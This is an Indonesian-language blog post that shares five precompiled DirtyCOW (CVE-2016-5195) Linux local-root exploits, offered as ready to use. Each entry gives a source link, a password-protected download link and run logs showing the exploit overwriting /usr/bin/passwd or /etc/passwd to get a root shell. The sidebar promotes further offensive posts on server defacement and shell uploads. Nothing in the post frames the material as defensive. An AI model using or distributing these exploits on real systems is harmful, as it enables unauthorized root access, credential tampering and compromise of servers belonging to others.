• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

CVE-2016-5195 (DirtyCOW) Privilege Escalation Exploit

October 14, 2016 by Jack Wilder Leave a Comment

Yooo.. kali ini mau share koleksi localroot dirtycow aja. barangkali ada yang butuh atau error saat compile. Soalnya yang saya share ini versi compile jadi tinggal pakai.

1. naughtyc0w
Source : https://gist.github.com/mak/c36136ccdbebf5ecfefd80c0f2ed6747
Download File : https://goo.gl/r1CnDT (password : linuxsec)
logs :
./naughty 0
[*] let make some c0ws dirty
[+] ok we have some dirty things going on
2. c0w
Source : https://gist.github.com/KrE80r/42f8629577db95782d5e4f609f437a54
Download File 64bit : https://goo.gl/5N9JOs (password : linuxsec)
Download File 32bit : https://goo.gl/iNFH30 (password : linuxsec)
logs :
./c0w
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
mmap fa65a000madvise 0ptrace 0
$ /usr/bin/passwd
[root@server foo]# whoami
root
[root@server foo]# id
uid=0(root) gid=501(foo) groups=501(foo)
3. dcow
Source : https://github.com/gbonacini/CVE-2016-5195
Download File : https://goo.gl/71lKdt (password : linuxsec)
logs :
./dcow -s
Running …
Root password is:   dirtyCowFun
Received su prompt (Password: )
[root@server foo]# whoami
root
4. cowroot
Source : https://gist.github.com/rverton/e9d4ff65d703a9084e85fa9df083c679
Download File : https://goo.gl/kELZXw (password : linuxsec)
logs :
./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 27832
Racing, this may take a while..
thread stopped
thread stopped
/usr/bin/passwd overwritten
Popping root shell.
Don’t forget to restore /tmp/bak
[root@server public_html]# whoami
root
5. dirty
Source : https://github.com/FireFart/dirtycow/blob/master/dirty.c
Download File : https://drive.google.com/open?id=0B5gYDnh1l7hXbzlnYzJpb3lzX2c (password : linuxsec)
logs :
./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: linuxsec
Complete line:
root:fiDHk6SmQq4KQ:0:0:pwned:/root:/bin/bash
mmap: 7f2e24495000
madvise 0
ptrace 0
..
Oke sekian artikel kali ini, kalo ada yang kurang jelas komen aja.

Filed Under: Uncategorized Tagged With: Exploit, Localroot

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

DNS Hijacking through Social Engineering

FastMail Custom Domain or Subdomain Takeover

bWAPP Remote File Inclusion Medium Security Level

Open Redirect Bypass Cheat Sheet

WordPress Plugin CopySafe PDF Protection Shell Upload

Mass Deface setelah Rooting Server

Deface WordPress dengan Exploit WordPress TheLoft Theme Arbitrary File Download Vulnerability

Exploit WordPress Plugin WP Mobile Edition Local File Disclosure Vulnerability

Laravel PHPUnit Remote Code Execution

Hack Targeted Website using Reverse IP

LinuxSec / 13 queries in 0.15 seconds